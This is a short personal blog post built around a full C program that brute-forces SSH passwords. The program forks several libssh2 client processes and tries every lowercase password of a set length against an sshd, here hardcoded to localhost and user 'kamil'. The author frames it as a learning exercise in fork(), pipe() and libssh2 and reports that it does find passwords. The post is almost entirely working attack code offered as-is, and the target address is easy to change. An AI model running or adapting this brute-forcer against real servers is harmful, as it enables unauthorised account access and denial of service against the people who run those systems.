---
author: kamilcukrowski
brand: xebia.com
date: 2014-10-23 15:48:24+02:00
email: kamilcukrowski@gmail.com
focus-keywords: hacking-via-ssh
guid: https://kernelodyssey.ovh/wp-json/wp/v2/posts/238
slug: hacking-via-ssh
status: publish
subtitle: ''
title: hacking-via-ssh
---

Hi. The below program creates N+1 threads, makes N connections with SSHD of a
given server and tries to guess the password with bruteforce method.
I wrote this program to learn about fork(), pipe() and libssh. It works, and
actually finds the password. It's really slow.

```
//  compile with gcc sshbreak.c -lssh2 -lncurses
// made by Kamil Cukrowski
#include <libssh2.h>
#include <libssh2_sftp.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <fcntl.h>
#include <errno.h>
#include <stdio.h>
#include <ctype.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <libssh2.h>
#include <curses.h>
#include <term.h>
#include <time.h>
#include <termios.h>

#define HOSTADDR "127.0.0.1"
#define USERNAME "kamil"
#define PERROR perror
#define PINFO printf

#define ALPHABET "abcdefghijklmnopqrstuvwxyz"
int child_number = 10; //number of connections to sshd on the given server
int length_max = 8; // you can specify min and max length of tried passwords
int length_min = 8;

int **pip;
char *passpoint;
int debug = 1;

FILE *info;

// ------------ misc ---------------

static void safe_exit()
{
	fclose(info);
	exit(0);
}

#define fatal(format, ...) \
do {\
	PERROR(format, ##__VA_ARGS__);\
	safe_exit();\
} while (0)


static void sig_hup ()
{
	PINFO("Cought signal. Shutting down");
	safe_exit();
}

static void parse_cmd(int argc, char *argv[])
{
	int c=0;
	extern char *optarg;
	while (c != -1) {
		c=getopt(argc, argv, "hdvi:c:");
		switch (c) {
		case 'h':
			printf("ssh break\n"
				": messaging system to LCD geteway.\n"
				"\t-v\tprint version and exit.\n"
				"\t-h\tdisplay this help.\n"
				"\t-d\tdebug monde on (do not fork into the background);\n"
				"\t-c\tchild number\n"
				"\t-i<IP address>\t server ip address.\n"
				"\t-c<IP address>\t address of the client which messages\n"
				"\t\tshould be displayed, may be specyfied multiple times\n"
				"\t-C\treset client list\n");
			exit(0);
		case 'v':
			exit(0);
		case 'c':
			child_number=atoi(optarg);
			break;
		case 'd':
			debug++;
			break;
		case 'i':
			//server_ip=inet_addr(optarg);
			break;
		}
	}
}

// ------------ LA ---------------

static int check_end(const int *buf, const int length, const int like_length) 
{
	int bufor = 0;
	int a;
	for(a=0; buf[a] == (like_length - 2) && a < (length / sizeof(int)); bufor++, a++);
	if(bufor == (length / sizeof(int)))
		return false;
	return true;
}

static int get_dlugosc(const int *buf, const int lenght) 
{
	int dlugosc = 0;
	int a;
	for(a = 0; buf[a] >= 0 && a < (lenght / sizeof(int)); dlugosc++, a++); //get aktualna dlugosc
	return dlugosc;
}

static void ceos(void) { // clear to end of screen
	tputs(clr_eos, 1, putchar);
}

static void clrscrn() { // clear the terminal screen and home the cursor
	tputs(clear_screen, 1, putchar);
}

static void cursor_move(int row, int col) 
{
	/* reject out of hand anything negative */
	if (--row < 0 || --col < 0) {
		return;
	}
	
	/* move the cursor */
	tputs(tparm(cursor_address, row, col, 0,0,0,0,0,0,0), 1, putchar);
}

static void tisend(char *parm) 
{
  if ( (char *) -1 != parm )
    tputs(parm, 1, putchar);
}

void terminal_init(char *progname) 
{
	int rows;
	 int cols;
	char *term = getenv("TERM");
	char *s;
	int  err_ret, color_flag;
	
	if ( !term || ! *term) {
		fprintf(stderr,"%s:  The TERM environment variable is not set.\n",
		progname);
		exit(4);
	}
	
	setupterm(term, 1, &err_ret);
	
	switch (err_ret) {
	case -1:
		fprintf(stderr,"%s: Can't access terminfo database - ", progname);
		fprintf(stderr,"check TERMINFO environment variable\n");
		exit(3);
		break;
	case 0:
		fprintf(stderr, "%s: Can't find entry for terminal %s\n", progname, term);
		exit(2);
		break;
	case 1:
		break;
	default:
		fprintf(stderr, "%s:  Unknown tgetent return code %d\n",
		progname, err_ret);
		exit(40);
	}
	
	s = getenv("COLUMNS");
	if ( !s || ! *s) {
		cols = tigetnum("cols");
	} else {
		cols = atoi(s);
		if (!cols) {
			cols = tigetnum("cols");
		}	
	}
	
	s = getenv("LINES");
	if ( !s || ! *s) {
		rows = tigetnum("lines");
	} else {
		rows = atoi(s);
		if (!rows) {
			rows = tigetnum("lines");
		}
	}
	
	if (rows < 30 || cols < 20) {
		printf(" rows or cols too small for me \n");
		exit(-1);
	}
	
	if (0 > (color_flag = tigetnum("colors"))) {
		color_flag = 0;
	}
	
	/* terminal init strings */
	tisend(init_1string);
	tisend(init_2string);
	tisend(init_3string);
	tisend(keypad_xmit);
	tisend(enter_ca_mode);
	
} // teminal_init()

void terminal_close() 
{
	int rows, cols;
	char *s;
	s = getenv("COLUMNS");
	if ( !s || ! *s) {
		cols = tigetnum("cols");
	} else {
		cols = atoi(s);
		if (!cols) {
			cols = tigetnum("cols");
		}	
	}
	
	s = getenv("LINES");
	if ( !s || ! *s) {
		rows = tigetnum("lines");
	} else {
		rows = atoi(s);
		if (!rows) {
			rows = tigetnum("lines");
		}
	}

	cursor_move(rows-20, 1);
	ceos();
	tisend(keypad_local);
	return;
}

int parent(int argc, char *argv[]) 
{
	const char alphabet[]=ALPHABET;
	bool finish=false;
	char last_write[child_number][length_max];
	char password[length_max+1];
	password[length_max]='&#92;&#48;';
	char response[2];
	int buf[length_max], nr=0;
	int a;
	time_t start, end;
	
	signal(SIGHUP, sig_hup);
	signal(SIGQUIT,sig_hup);
	signal(SIGTERM,sig_hup);
	signal(SIGINT,sig_hup);
	
	//close unusefull pipes
	close(pip[0][1]); //close parent write pipe
	for(a = 1; a <= child_number; close(pip[a++][0])); //close child read pipe

	//writing the start value to variables
	for(a = 0; a < length_min; buf[a++] = 0);
	for(a = length_min; a < (sizeof(buf) / sizeof(int)); a++)buf[a]=-1;


	//make a log file
	info = fopen("log.txt", "w");
	fprintf(info, "This is the log file of parent. HF! \n");

	terminal_init(argv[0]); //init console
	clrscrn(); //clear the sreen
	
	//put some information on the screen	
	printf("This is a program to find ssh passwords.\n"
		"Made by Kamil Cukrowski. No rights reserved.\n"	
		"Given alphabet: %s \n", alphabet);
	if(length_max == 0) {
		printf("Error: the maximal lenght of searched password is 0.\n");
		return(-1);
	}
	if(length_min < 0) {
		printf("ERROR: The minimal lenght of searched password is negativ. Here's the value of it: %d \n", length_min);
		return(-1);
	}
	if(length_min > 0)
		printf("The minimal lenght of searched password: %d \n", length_min);
	printf("The maximal lenght of searched password: %d \n", length_max);
	printf("Number of childs: %d \n", child_number);
	printf("Current trying password: \n"
		"Password number: \n"
		"Running in sec: \n"
		"Speed (passwords/sek): \n\n");

	time(&start);
	while(check_end(buf, sizeof(buf), sizeof(alphabet)) && !finish) { //main loop
		buf[0]++; nr++; //increase buf[0] and number :)

		//checking if buf gets the lats number of sizeof(alfabet). When yes, the incrasing next letter of password and writing to this buf[a] zero. it makes from password="z" password="aa".
		for(a = 0; buf[a] == (sizeof(alphabet)-1) && a < ((sizeof(buf)/sizeof(int))-1); a++) {
			buf[a] = 0;
			buf[a+1]++;
		}


		//make a lettered password from buf[] and write it into password[]
		memset(password, 0, sizeof(password));
		for(a = 0; a <= (get_dlugosc(buf, sizeof(buf))-1) && a < (sizeof(buf)/sizeof(int)); a++)
			password[a] = alphabet[buf[a]];
	
		if (read(pip[0][0], response, sizeof(response) ) == -1) fatal("read pipe response");
		if(response[1] == TRUE ) { //when I found the password
			memcpy(password, last_write[response[0] - 1], sizeof(password));
			finish = 1;
			break; //get out from main loop
		}
	
		fprintf(info, "Parent: Response: %x|%x numer %d password %s \n", response[0], response[1], nr, password);

		if(write(pip[(int)response[0]][1], password, sizeof(password) ) == -1) fatal(" ");
		memcpy(last_write[(int)response[0]], password, sizeof(password) );
		

		//write everything on the screen
		time(&end);
		cursor_move(7, 30);
		printf("%s\n", password);
		cursor_move(8, 30);
		printf("%d\n", nr);
		cursor_move(9, 30);
		printf("%f\n",  (difftime(end, start)));
		cursor_move(10, 30);
		printf("%f\n", nr / difftime(end, start) );
		
		printf("\n");
		
	} // while(check_end(buf, sizeof(buf), sizeof(alfabet)) && !finish)
	
	//print lucky text if(finish) and sad if(!finish)
	if(finish) {
		printf("Password found! Password = \"%s\" \n Ending with succes. \n", password);
		fprintf(info, "Password found! Password = \"%s\" \n Ending with succes. \n", password);
	} else {
		printf("I have reached the maximal length passwords. \n I haven't found the correct password. \n Last password tried: %s \n Ending without succed. \n", password);
		fprintf(info, "I have reached the maximal length passwords. \n I haven't found the correct password. \n Last password tried: %s \n Ending without succed. \n", password);
	}
	
	fclose(info);
	terminal_close();
	return (finish - 1);
} // parent();
	
static void kbd_callback(const char *name, int name_len, const char *instruction, int instruction_len, int num_prompts, const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts, LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract)
{
	(void)name;
	(void)name_len;
	(void)instruction;
	(void)instruction_len;
	if (num_prompts == 1) {
		responses[0].text = strdup(passpoint);
		responses[0].length = strlen(passpoint);
	}
	(void)prompts;
	(void)abstract;
} /* kbd_callback */  
 
static int ssh_connect(LIBSSH2_SESSION **session, int *sock)
{
	struct sockaddr_in sin;
	
	*sock = socket(AF_INET, SOCK_STREAM, 0);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(22);
	sin.sin_addr.s_addr =  inet_addr(HOSTADDR);
	if (connect(*sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in)) != 0) {
		fprintf(stderr, "failed to connect!\n");
		return -1001;
	}
	
	*session = libssh2_session_init();
	if (libssh2_session_handshake(*session, *sock)) {
		fprintf(stderr, "Failure establishing SSH session\n");
		return -1002;
	}
	return 0;
}

static int ssh_get_auth_prv(LIBSSH2_SESSION **session, int *sock)
{
	/* check what authentication methods are available */ 
	int ret = 0;
	char *userauthlist;
	userauthlist = libssh2_userauth_list(*session, USERNAME, strlen(USERNAME));
	
	if (strstr(userauthlist, "password") != NULL) {
		ret|=0x1;
	}
	if (strstr(userauthlist, "keyboard-interactive") != NULL) {
		ret|=0x10;
	}
	if (strstr(userauthlist, "publickey") != NULL) {
		ret|=0x100;
	}
	return ret;
}

static void ssh_disconnect(LIBSSH2_SESSION **session, int *sock)
{
	libssh2_session_disconnect(*session, "Normal Shutdown, Thank you for playing");
	libssh2_session_free(*session);
	close(*sock);
}

static void ssh_reconnect(LIBSSH2_SESSION **session, int *sock)
{
	ssh_disconnect(session, sock);
	usleep(1000);
	ssh_connect(session, sock);
}
 
int child(int number)
{
	char answer[2] = { [0]=number, [1]=0} ;
	int result, ret, sock;
	int posibi;
	LIBSSH2_SESSION *session = NULL;
	char password[length_max + 1];
	
	signal(SIGHUP, sig_hup);
	signal(SIGQUIT,sig_hup);
	signal(SIGTERM,sig_hup);
	signal(SIGINT,sig_hup);
	
	{
		char buf[256];
		sprintf(buf, "logchild%d.txt", number);
		info = fopen(buf, "w");
		fprintf(info, "child nr %d \n", number );
	}
	
	ret = libssh2_init (0);
	if (ret != 0) {
		fprintf (stderr, "libssh2 initialization failed (%d)\n", ret);
		return -1000;
	}
	
	if ( ssh_connect(&session, &sock) < 0) {
		fatal("ssh_connect");
	}
	
	posibi	= ssh_get_auth_prv(&session, &sock);
	
	//close unusefull pipes
	close(pip[0][0]); //close parents read pipe
	for(ret = 0; ret < number; ret++) close(pip[number][1]); // close pipes to other childs?
	

	//initial answer to parent
	if(write(pip[0][1], answer, sizeof(answer)) == -1) fatal(" ");
	
	
	while(!result) {
	
		//get the password grom parent
		memset(password, 0, sizeof(password));
		while(password[0] == 0) {
			usleep(50000);
			if(read(pip[number][0], password, sizeof(password)) == -1) fatal(" ");
		}	
	
		fprintf(info, "password %s \n", password);
		
one_more_time:

		/* check if passworrd is correct */
		if (posibi & 0x1) {
			ret = libssh2_userauth_password(session, USERNAME, password);
		} else if (posibi & 0x10) {
			passpoint = password; /* give callback password */
			ret = libssh2_userauth_keyboard_interactive(session, USERNAME, &kbd_callback);
		} else if (posibi & 0x100) {
			//ret = libssh2_userauth_publickey_fromfile(session, USERNAME, "~/.ssh/id_rsa.pub", "~/.ssh/id_rsa", password);
			ret = -1;
		}
	
		switch(ret) {
		case 0:
			result = true;
			break;
		case LIBSSH2_ERROR_ALLOC:
		case LIBSSH2_ERROR_SOCKET_SEND:
		case LIBSSH2_ERROR_SOCKET_TIMEOUT:
			{
				char *message;
				int error;
				error = libssh2_session_last_error(session, &message, NULL, 0);
				fprintf(info, "error %d  mesg %s \n", error,  message);
			}
			result = false;
			goto ssh_fail;
			break;
		case LIBSSH2_ERROR_AUTHENTICATION_FAILED:
		case LIBSSH2_ERROR_PUBLICKEY_UNVERIFIED:
		default:
			{
				char *message;
				int error;
				error = libssh2_session_last_error(session, &message, NULL, 0);
				fprintf(info, "ret %d | error %d  mesg %s \n", ret, error,  message);
				if ( strcmp(message, "Authentication failed (username/password)") ) {
					result=50;
				} else result = false;
			}
			if (result == 50) {
				ssh_reconnect(&session, &sock);
				goto one_more_time;
			}
			result = false;
		}
		
		//write result with child number to parent
		answer[1] = result;
		if(write(pip[0][1], answer, sizeof(answer)) == -1) fatal(" ");
		
	} // while(!result)

ssh_fail:
	ssh_disconnect(&session, &sock);
	libssh2_exit();
	
	fclose(info);
	
	return 0;
} /* child () */

int main(int argc, char *argv[]) 
{
	int a;
	
	pip = malloc(sizeof(*pip)*(child_number+1));
	if (!pip) fatal("malloc");
	for (a=0; a<child_number+1; a++) {
		pip[a] = malloc(sizeof(*pip[a])*2);
		if (!pip[a]) fatal("malloc");
	}
	
	//initial parents pipe to communicate children with parent
	if(pipe(pip[0]) == -1) fatal("pipe create 1 ");
	
	for(a = 1; a <= child_number; a++) {
	
		usleep(100000);
		
		if(pipe(pip[a]) == -1) fatal("pipe create"); //initial pipe[a] for child(a)
		
		switch(fork()) { //fork to make child(a)
		case 0:
			child(a);
			free(pip[0]);
			free(pip[1]);
			return 0;
		case -1:
			fatal("fork");
		default:
			if(a == child_number) { //if it's the end of loop, run parent();
				//parent(argc, argv);
			} else { 
				//if not, run another child
				close(pip[a][0]); //  close read child pipe, for the next child they are unusefull
			}
			break;
		}
	}
	
	parent(argc, argv);
	free(pip[0]);
	free(pip[1]);
	return 0;
} //main ()

```
